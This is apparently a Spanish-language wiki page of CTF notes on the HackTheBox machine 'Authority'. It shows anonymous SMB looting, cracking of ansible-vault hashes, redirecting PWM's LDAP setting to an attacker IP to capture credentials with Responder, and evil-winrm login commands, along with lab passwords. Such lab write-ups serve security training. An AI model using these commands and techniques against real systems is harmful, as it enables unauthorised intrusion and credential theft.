Notas de Luis

Hacemos el escaneo de nmap:

Comenzamos con la enumeración de SMB por el puerto 445, donde nos encontramos con dos recursos compartidos que pueden ser interesantes, por lo que revisamos el recurso de Department Shares y no hay nada interesante:

Pero si miramos el otro recurso compartido de Development, sí que encontramos cosas, donde corre un servicio de Ansible:

smbclient -N //10.10.11.222/Development/

Nos descargamos todo el recurso compartido de Ansible para poder analizarlo con más detalle:

smbclient -N //10.10.11.222/Development/ -c "recurse; prompt; mget *"

Y dentro del directorio /Automation/Ansible/PWM/ansible_inventory nos encontramos con unas credenciales de ansible:

administrator:Welcome1

Y dentro de esta otra ruta nos encontramos con unos hashes de ansible dentro del fichero main.yml:

/Automation/Ansible/PWM/defaults/main.yml

Y también tenemos unas credenciales de tomcat:

admin:T0mc@tAdm1n
robot:T0mc@tR00t

Comenzamos con el cracking de los hashes de ansible, donde vamos a copiar cada uno de ellos con la siguiente estructura:

Ahora extraemos el hash de cada uno de estos archivos para crackearlo con john the ripper:

Aplicamos el cracking y obtenemos las siguientes credenciales, donde vemos la misma contraseña:

!@#$%^&*

Ya podremos desencriptar cada uno de los hashes de ansible con la herramienta ansible-vault, la cual debemos de instalarla con pip previamente: pip install ansible-vault

svc_pwm
pWm_@dm!N_!23
DevT3st@123

Accedemos al puerto 8443, donde si intentamos iniciar sesión nos sale el siguiente error de directorio:

Hacemos clic en configuration editor:

Y nos pide una contraseña, la cual si probamos con las que hemos crackeado anteriormente, esta sería la correcta:

pWm_@dm!N_!23

Hacemos clic en cancel y nos encontramos con esta web:

Nos bajamos el fichero de configuración:

Dentro de este archivo debemos de localizar la siguiente línea, que es donde se autentica el servidor ldap:

Y la reemplazamos por esta otra, poniendo nuestra IP y un puerto:

<value>ldap://10.10.16.7:389</value>

Y subimos la nueva configuración al servidor:

Una vez hecho esto, podemos ponernos en escucha con el responder y habremos capturado el hash del usuario svc_ldap:

responder -I tun0

Estas son las credenciales:

svc_ldap:lDaP_1n_th3_cle4r!

Y con evil-winrm podemos autenticarnos:

evil-winrm -i 10.10.11.222 -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'

Dentro de la raíz del servidor nos encontramos con un directorio interesante, el cual se llama Certs:

Hay una herramienta para detectar si un certificado es vulnerable, la cual se llama certify.exe:

computing/hacking/ctf/hackthebox/maquina_authority.txt · Última modificación: por 127.0.0.1